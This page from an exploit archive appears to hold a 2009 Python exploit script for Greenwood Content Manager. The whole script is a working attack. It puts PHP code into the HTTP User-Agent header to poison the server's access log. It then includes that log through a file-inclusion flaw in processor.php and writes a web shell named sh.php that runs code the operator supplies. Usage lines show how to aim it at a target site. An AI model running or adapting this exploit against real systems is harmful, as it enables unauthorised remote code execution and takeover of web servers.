Home / os / win10

gcm-exec.txt

Posted on 15 July 2009

#!usr/bin/python ##################################################################################### #### Greenwood Content Manager Remote Code Execution #### ##################################################################################### # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : http://ircrash.com # #My Official WebSite : http://r3dw0rm.ir # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) # ##################################################################################### # # #Download : http://garr.dl.sourceforge.net/sourceforge/greenwood/greenwood-release-0.3.2.tar.bz2 # # #Dork : :( # # # ##################################################################################### # [Bug] # # # #http://[site]/[path]/include/processor.php?content_path=[evil_code_path] # # # ###################################### TNX GOD ###################################### import sys,httplib,urllib if len(sys.argv) < 3 : print " Usage : " + sys.argv[0] + " [site] [path] " print "Ex : " + sys.argv[0] + " 123.com /greenwood/ " print "Powered by : Sina Yazdanmehr( R3d.W0rm ) " print "http://IrCrash.com - http://R3dW0rm.ir " exit() if 'http://' in sys.argv[1] : sys.argv[1]=sys.argv[1].replace('http://','') print "Input evil code.( With out ' and <??> )( Ex. include $_GET[file]; ) " shell=raw_input('Code : ') user_agent={'User-Agent':'<?php fwrite($fp=fopen("../var/sh.php","w+"),'<?php /* Exploited by : R3d.W0rm - http://r3dw0rm.ir */ ' + shell + '?>');fclose($fp); ?>'} conn=httplib.HTTPConnection(sys.argv[1],80) conn.request("POST",'/' + sys.argv[2] + '/','',user_agent) response=conn.getresponse().read() urllib.urlopen('http://' + sys.argv[1] + '/' + sys.argv[2] + '/include/processor.php?content_path=../var/access_log') print " Shell created : http://" + sys.argv[1] + sys.argv[2] + "/var/sh.php "

 

TOP